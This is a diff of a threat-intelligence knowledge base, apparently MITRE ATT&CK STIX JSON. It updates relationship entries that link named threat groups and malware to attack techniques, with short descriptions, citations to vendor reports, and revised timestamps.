+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has had its code obfuscated in an apparent attempt to make analysis difficult.(Citation: Fortinet Agent Tesla April 2018) [Agent Tesla](https://attack.mitre.org/software/S0331) has used the Rijndael symmetric encryption algorithm to encrypt strings.(Citation: Malwarebytes Agent Tesla April 2020)",
"id": "relationship--4d7e8d98-9894-4dfa-9013-af8d83e6faea",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.300Z",
+ "modified": "2020-05-28T23:41:03.778Z",
"created": "2019-01-29T18:44:04.939Z"
},
{
@@ -66709,16 +67770,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.639Z",
+ "modified": "2020-04-21T23:09:31.048Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -66899,27 +67960,6 @@
"modified": "2020-03-17T00:19:38.025Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "id": "relationship--d36e441f-3455-4373-a1e9-be28f3d50c76",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) sent malicious attachments to victims over email, including an Excel spreadsheet containing macros to download Pupy.(Citation: SecureWorks Mia Ash July 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- }
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
- "type": "relationship",
- "modified": "2019-09-09T19:21:42.307Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--83cfa11e-f221-4dc4-b184-943c2c7f4562",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -67290,12 +68330,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--4438ba64-0cd2-46e9-8a67-c685bf9b404c",
@@ -67617,28 +68657,33 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"type": "relationship",
- "modified": "2020-03-26T18:13:00.752Z",
+ "modified": "2020-05-26T15:02:19.963Z",
"created": "2017-05-31T21:33:27.019Z"
},
{
"id": "relationship--c63c7dc5-e374-4bf0-9839-0f940ac6d46c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can communicate over HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can communicate over HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T01:23:05.084Z",
+ "modified": "2020-06-22T17:55:32.004Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -67694,29 +68739,34 @@
"target_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
- "source_name": "ClearSky MuddyWater Nov 2018",
+ "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
- "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018."
+ "source_name": "ClearSky MuddyWater Nov 2018"
},
{
- "source_name": "Symantec MuddyWater Dec 2018",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
"url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group",
- "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018."
+ "source_name": "Symantec MuddyWater Dec 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
- "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Symantec MuddyWater Dec 2018)",
+ "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater June 2019)",
"type": "relationship",
- "modified": "2019-06-28T15:30:59.094Z",
+ "modified": "2020-05-18T18:28:00.134Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -67864,12 +68914,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99"
}
],
- "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--76bd87d6-517e-4294-b4c5-a5a01308bf35",
@@ -68020,7 +69070,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
- "modified": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-04-29T22:01:48.243Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -68155,12 +69205,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--c9412068-a35c-4be3-9945-a1f69f2f77db",
@@ -68335,27 +69385,6 @@
"modified": "2019-04-24T23:18:53.242Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "id": "relationship--5bb39b9d-3651-4cdf-80b1-9d88b2062258",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) has used TCP port 8080 for C2.(Citation: Palo Alto Shamoon Nov 2016)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Palo Alto Shamoon Nov 2016",
- "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
- }
- ],
- "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "type": "relationship",
- "modified": "2019-04-24T23:59:16.304Z",
- "created": "2017-12-14T16:46:06.044Z"
- },
{
"id": "relationship--cf9e7512-c510-4605-9035-f60335c351f4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -68616,12 +69645,12 @@
"url": "http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2"
}
],
- "source_ref": "malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--37dd9a3c-dd52-4541-be7c-b490d026305c",
@@ -68632,16 +69661,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.993Z",
+ "modified": "2020-05-12T22:13:16.875Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -68679,12 +69708,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688"
},
{
"id": "relationship--a7744970-817e-43c6-89e4-86907ac20361",
@@ -68784,16 +69813,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.997Z",
+ "modified": "2020-05-12T22:13:16.851Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -68852,12 +69881,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--b9c05069-a05f-4b74-9b4d-275c64f2e124",
@@ -69024,22 +70053,26 @@
{
"id": "relationship--f9773935-853e-4d5e-9345-9587fd77340d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[DustySky](https://attack.mitre.org/software/S0062) scans the victim for files that contain certain keywords from a list that is obtained from the C2 as a text file. It also collects information about installed software.(Citation: DustySky)",
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.162Z",
+ "modified": "2020-05-14T15:14:33.557Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -69432,7 +70465,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -69440,7 +70473,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.334Z",
+ "modified": "2020-06-22T17:54:15.746Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -69771,7 +70804,7 @@
{
"id": "relationship--79057890-3cd0-4124-8b35-b86db6b4f9d7",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks.(Citation: Volexity OceanLotus Nov 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -69780,13 +70813,18 @@
"source_name": "Volexity OceanLotus Nov 2017",
"description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.",
"url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/"
+ },
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-18T19:33:54.985Z",
+ "modified": "2020-06-19T20:04:12.428Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -69800,14 +70838,19 @@
"target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60",
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
- "description": "(Citation: Unit 42 MuddyWater Nov 2017)",
+ "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"type": "relationship",
- "modified": "2019-06-28T15:30:59.088Z",
+ "modified": "2020-05-18T19:46:02.259Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -70041,22 +71084,27 @@
{
"id": "relationship--935f9bb6-d38d-42d1-a764-6b5110ad5364",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exploited Microsoft Word vulnerability CVE-2014-4114 for execution.(Citation: Symantec Tick Apr 2016)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan",
+ "source_name": "Symantec Tick Apr 2016",
"description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.",
- "source_name": "Symantec Tick Apr 2016"
+ "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.320Z",
+ "modified": "2020-06-24T01:27:31.912Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -70089,7 +71137,7 @@
],
"external_references": [
{
- "url": "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf",
+ "url": "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
"description": "RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.",
"source_name": "RSA Shell Crew"
}
@@ -70098,7 +71146,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5",
"type": "relationship",
- "modified": "2019-03-22T20:09:34.778Z",
+ "modified": "2020-04-17T21:11:30.420Z",
"created": "2017-05-31T21:33:27.044Z"
},
{
@@ -70482,12 +71530,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c"
},
{
"id": "relationship--5c736aad-9847-4059-9d1e-dc2f551952d0",
@@ -70613,16 +71661,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.077Z",
+ "modified": "2020-05-12T22:13:16.802Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -70634,7 +71682,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -70643,7 +71691,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.229Z",
+ "modified": "2020-04-16T19:41:40.653Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -70712,7 +71760,7 @@
{
"id": "relationship--4e88ec20-d309-440d-a685-0d2abdc1d7ef",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve OS name/architecture and computer/domain name information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve OS name/architecture and computer/domain name information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -70721,13 +71769,18 @@
"url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
"source_name": "FireEye MuddyWater Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-04-22T22:36:53.015Z",
+ "modified": "2020-05-18T19:37:52.441Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -70746,9 +71799,9 @@
],
"source_ref": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-20T17:47:38.377Z",
+ "modified": "2020-06-23T20:40:40.910Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -70960,9 +72013,9 @@
],
"source_ref": "intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74",
"relationship_type": "uses",
